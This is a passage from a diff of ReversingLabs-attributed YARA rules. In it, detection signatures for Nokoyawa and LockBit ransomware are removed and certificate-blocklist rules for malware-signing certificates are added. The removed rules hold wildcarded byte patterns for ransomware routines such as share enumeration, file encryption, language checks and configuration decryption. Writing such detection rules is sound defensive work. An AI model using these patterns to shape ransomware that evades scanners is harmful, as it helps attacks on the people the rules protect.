+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16890-L16906"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "85b7d93db06007d0043b1489b532410ccc700cf082b641fff8a09de2ffe9101d"
+		logic_hash = "23ab2343b17dce74fb4166a690ca5dd300b3ed20d3a6b43b922f456410d3035d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Nokoyawa"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_shares = {
-            48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            48 8D 44 24 ?? 48 89 44 24 ?? 4C 8B 8C 24 ?? ?? ?? ?? 45 33 C0 33 D2 B9 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 7C 24 ?? ?? 74 ?? 33 C0 E9 ?? ?? ?? ?? 8B 44 24 ??
-            8B D0 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 75 ?? 33 C0
-            E9 ?? ?? ?? ?? 8B 44 24 ?? 44 8B C0 33 D2 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 4C 8D 4C 24
-            ?? 4C 8B 44 24 ?? 48 8D 54 24 ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 7C
-            24 ?? ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? FF C0 89 44 24
-            ?? 8B 44 24 ?? 39 44 24 ?? 73 ?? 48 8B 44 24 ?? 83 78 ?? ?? 75 ?? 8B 44 24 ?? 48 6B
-            C0 ?? 48 8B 4C 24 ?? 48 8B 54 01 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
-            ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 48 6B C0
-            ?? 48 8B 4C 24 ?? 8B 44 01 ?? 83 E0 ?? 83 F8 ?? 75 ?? 8B 44 24 ?? 48 6B C0 ?? 48 8B
-            4C 24 ?? 48 03 C8 48 8B C1 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? EB ?? 81 7C 24 ??
-            ?? ?? ?? ?? 74 ?? EB ?? 81 7C 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF
-            15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15
-        }
-		$find_files_p1 = {
-            FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83
-            E0 ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 84
-            ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48
-            8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ??
-            ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 48 8D 4C 24
-            ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ??
-            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ??
-            ?? ?? 74 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 3D ?? ?? ?? ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B 8C 24 ??
-            ?? ?? ?? 0F B7 04 41 83 F8 ?? 75 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48
-        }
-		$find_files_p2 = {
-            98 48 8B 8C 24 ?? ?? ?? ?? 0F B7 04 41 83 F8 ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B 8C 24 ?? ?? ?? ??
-            0F B7 04 41 83 F8 ?? 75 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B
-            8C 24 ?? ?? ?? ?? 0F B7 04 41 83 F8 ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 4C
-            24 ?? E8 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ??
-            ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 75 ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B 4C
-            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48
-            81 C4
-        }
-		$encrypt_files = {
-            48 89 4C 24 ?? 48 83 EC ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 89 44 24 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? B9 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 89 44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24
-            ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4C 24 ??
-            E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 41 B8 ?? ?? ?? ?? 33 D2
-            48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ??
-            48 8B 4C 24 ?? 48 89 48 ?? 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 C7
-            40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ??
-            48 89 48 ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 48 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B 4C 24 ?? 48 89 41 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 41 ??
-            48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 C0 ?? 48 8B 94 24 ?? ?? ??
-            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 98 4C 8B C0 48 8D
-            15 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 48 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 C0 ??
-            48 8B D0 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24
-            ?? 48 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 45 33 C9 41 B8
-            ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 50 ?? 48 8B 44 24 ?? 48 8B 48 ?? FF 15 ?? ?? ?? ??
-            48 8D 05 ?? ?? ?? ?? F0 FF 00 48 83 C4 ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $enum_shares ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "XECURE LAB CO., LTD." and pe.signatures [ i ] . serial == "21:2c:a2:39:86:6f:88:c3:d5:b0:00:b3:00:4a:56:9c" and 1347840000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Lockbit : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_18B700A319Aa98Ae71B279D4E8030B82 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects LockBit ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9a6405dc-da1f-5426-a424-a73bceb1928c"
-		date = "2020-06-26"
-		modified = "2022-03-31"
+		id = "8d1a98aa-a895-5e79-905c-760166352d4f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.LockBit.yara#L1-L282"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16908-L16924"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "030222bd659c7e0e03858fa062067b1483aca3b7973cce19a1e7cdbb48d4405c"
+		logic_hash = "e201498acfd9afebc68321887a806bb5c1d74c64a7cd93530feae2a944bd30fa"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "LockBit"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_resources_v1 = {
-            55 8B EC 83 EC ?? 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 51 6A ?? 6A ?? 6A ?? C7 45 ??
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ??
-            ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 53 56 FF 75 ?? 6A ?? 57 E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            33 DB 39 5D ?? 76 ?? 8B F7 0F 1F 80 ?? ?? ?? ?? F7 46 ?? ?? ?? ?? ?? 74 ?? 8B CE E8
-            ?? ?? ?? ?? 83 7F ?? ?? 74 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 83 C4 ?? 8B 45
-            ?? FF 70 ?? FF 15 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 8B 45 ?? FF 70 ?? 57 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 45 ?? 50 6A ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B
-            0D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? F0 FF 05 ?? ?? ?? ?? 8B 7D ?? 43 83 C6 ?? 3B 5D
-            ?? 72 ?? E9 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5E 5B 85 C0
-            75 ?? B8 ?? ?? ?? ?? 5F 8B E5 5D C3 33 C0 5F 8B E5 5D C3
-        }
-		$find_files_v1_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 8B C1 C7 45 ?? ?? ?? ?? ?? 57 50 89 45 ?? 33 C9 8D
-            45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 66 89 4D ?? 50 FF 15 ?? ?? ?? ?? 83
-            C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ??
-            ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 33 C0 8B 35 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D
-            45 ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D3 85 C0
-            0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85
-            C0 0F 84
-        }
-		$find_files_v1_2 = {
-            45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 33 C9 66 39 8D ?? ?? ?? ?? 74 ?? 8D 40 ?? 41 66 83 38 ?? 75 ??
-            83 F9 ?? 0F 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 56 68 ?? ??
-            ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ??
-            56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84
-        }
-		$find_files_v1_3 = {
-            85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ??
-            ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ??
-            56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84
-            ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 33 C9 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ??
-            ?? ?? 66 90 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 33 C0 C6 45 ?? ?? 66 89 45 ?? 8D
-            45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
-            C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68
-            ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3
-            85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ??
-            ?? ?? 8B 4D ?? 8D 95 ?? ?? ?? ?? 2B D1 0F B7 01 8D 49 ?? 66 89 44 11 ?? 66 85 C0 75
-            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B F2 66 8B 02 83 C2 ??
-            66 85 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 83 C7 ?? 0F 1F 40 ?? 66 8B 47 ?? 83 C7 ?? 66
-            85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 A8 ?? 75 ??
-            A8 ?? 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF D6
-            83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 57 FF 15 ?? ?? ?? ?? 5F
-            5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_v1_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 53 56 57 8B F9 C7 45 ?? ?? ??
-            ?? ?? 89 7D ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66
-            89 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-        }
-		$encrypt_files_v1_2 = {
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 33 DB 89 7D ?? 33 F6 0F 1F 00 8B 84
-            B5 ?? ?? ?? ?? 85 C0 74 ?? 57 50 FF 15 ?? ?? ?? ?? 85 C0 B8 ?? ?? ?? ?? 0F 44 D8 46
-            81 FE ?? ?? ?? ?? 7C ?? 8B 7D ?? 33 C0 66 89 85 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 57 50 8D 85 ?? ?? ?? ?? 89 5D ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 F6 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
-            85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D3 83 F8 ?? 75
-            ?? 8B CF E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B
-        }
-		$encrypt_files_v1_3 = {
-            CF E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 83 FE ?? 7D ?? 46 EB ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83
-            FB ?? 75 ?? 8B 1D ?? ?? ?? ?? EB ?? FF 35 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B
-            E5 5D C3 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 ?? FF 75 ?? FF 15
-            ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 8B 45 ?? 8B 75 ?? 89 43 ?? 8D 43 ?? 50 56 C7
-            43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF 15 ?? ??
-            ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 8B 4B ?? 8B 43 ?? 85
-            C9 7F ?? 7C ?? 83 F8 ?? 72 ?? 83 E8 ?? C7 43 ?? ?? ?? ?? ?? 89 43 ?? 8B 43 ?? 83 D9
-            ?? 89 43 ?? 8B 43 ?? 89 43 ?? 8D 83 ?? ?? ?? ?? 6A ?? 50 89 4B ?? C7 43 ?? ?? ?? ??
-            ?? 89 73 ?? E8 ?? ?? ?? ?? 6A ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 53 6A ?? 6A ??
-            8D 73 ?? 56 FF 73 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ??
-            ?? ?? ?? 74 ?? 56 8B 35 ?? ?? ?? ?? FF D6 83 C4 ?? 53 FF D6 83 C4 ?? FF 75 ?? FF 15
-            ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 F0 FF 05 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ??
-            B8 ?? ?? ?? ?? F0 0F C1 05 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 7E ?? 8B 35 ?? ?? ?? ?? 6A
-            ?? FF D6 83 3D ?? ?? ?? ?? ?? 7D ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
-        }
-		$check_blacklisted_languages_v2 = {
-            FF D0 0F B7 C0 B9 2C 08 ?? ?? 66 3B C1 0F 84 ?? ?? ?? ?? B9 2C 04 ?? ?? 66 3B C1 74
-            ?? B9 2B 04 ?? ?? 66 3B C1 74 ?? B9 23 04 ?? ?? 66 3B C1 74 ?? B9 37 04 ?? ?? 66 3B
-            C1 74 ?? B9 3F 04 ?? ?? 66 3B C1 74 ?? B9 40 04 ?? ?? 66 3B C1 74 ?? B9 19 08 ?? ??
-            66 3B C1 74 ?? B9 19 04 ?? ?? 66 3B C1 74 ?? B9 28 04 ?? ?? 66 3B C1 74 ?? B9 42 04
-            ?? ?? 66 3B C1 74 ?? B9 43 08 ?? ?? 66 3B C1 74 ?? B9 43 04 ?? ?? 66 3B C1 74 ?? B9
-            22 04 ?? ?? 66 3B C1 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 DB 0F 85 ?? ?? ?? ?? 64
-            A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B C8 89 45 ?? 8B D0 89 4D ?? 0F B7 59 ?? 33
-            FF 8B 71 ?? D1 EB C7 45 ?? ?? ?? ?? ?? 8D 04 5E 3B F0 0F 47 DF 85 DB 74 ?? 8A 0E 8D
-            76 ?? 0F BE D1 80 E9 ?? 8B C2 83 C8 ?? 80 F9 ?? 0F 47 C2 47 33 45 ?? 69 C0 ?? ?? ??
-            ?? 89 45 ?? 3B FB 75 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 01 8B
-            C8 89 4D ?? 3B C2 74 ?? 83 79 ?? ?? 75 ?? 33 DB 89 1D ?? ?? ?? ?? A1 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 8B 43 ?? 8B 4C 18 ?? 8D 04 19 89 45 ??
-            3B C3 74 ?? 33 C9 89 4D ?? 39 48 ?? 74 ?? 8B 40 ?? 8B 55 ?? 03 C3 89 45 ?? 0F 1F 40
-            ?? 8B 30 BF ?? ?? ?? ?? 8A 04 1E 03 F3 46 84 C0 74 ?? 0F BE D0 8D 76 ?? 2C ?? 8B CA
-            83 C9 ?? 3C ?? 8A 46 ?? 0F 47 CA 33 CF 69 F9 ?? ?? ?? ?? 84 C0 75 ?? 8B 4D ?? 8B 55
-            ?? 81 FF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 41 83 C0 ?? 89 4D ?? 89 45 ?? 3B 4A
-            ?? 75 ?? 33 C0 A3 ?? ?? ?? ?? 6A ?? FF D0 5F 5E 5B 8B E5 5D C3
-        }
-		$create_net_host_trav_threads_v2 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 83 C4 ?? 8B 40 ?? 50 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? FF D0 85 C0 78 ?? A1 ?? ?? ?? ?? 8D 0C 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? F0 FF 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 35
-        }
-		$fnv1a_hashing_v2 = {
-            55 8B EC 83 EC ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 50 ?? A1 ?? ?? ?? ??
-            89 55 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 D2 75 ?? 33 C0 A3 ?? ?? ?? ?? 8B E5 5D C3 8B 42
-            ?? 8B 4C 10 ?? 8B 44 10 ?? 89 45 ?? 8D 04 11 89 45 ?? 3B C2 74 ?? 53 33 C9 56 57 89
-            4D ?? 39 48 ?? 74 ?? 8B 78 ?? 03 FA 8B 07 BE
-        }
-		$decrypt_configuration_v2_1 = {
-            55 8B EC 51 53 56 57 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 03 C9 83 EA ?? 75 ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? BA 25 1B 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? BA 78 0C 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            BA 39 28 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA F1 40
-            00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA BF 11 00 00 B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA 28 02 00 00 B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA 3B 07 00 00 B9 ?? ?? ?? ?? E8 ??
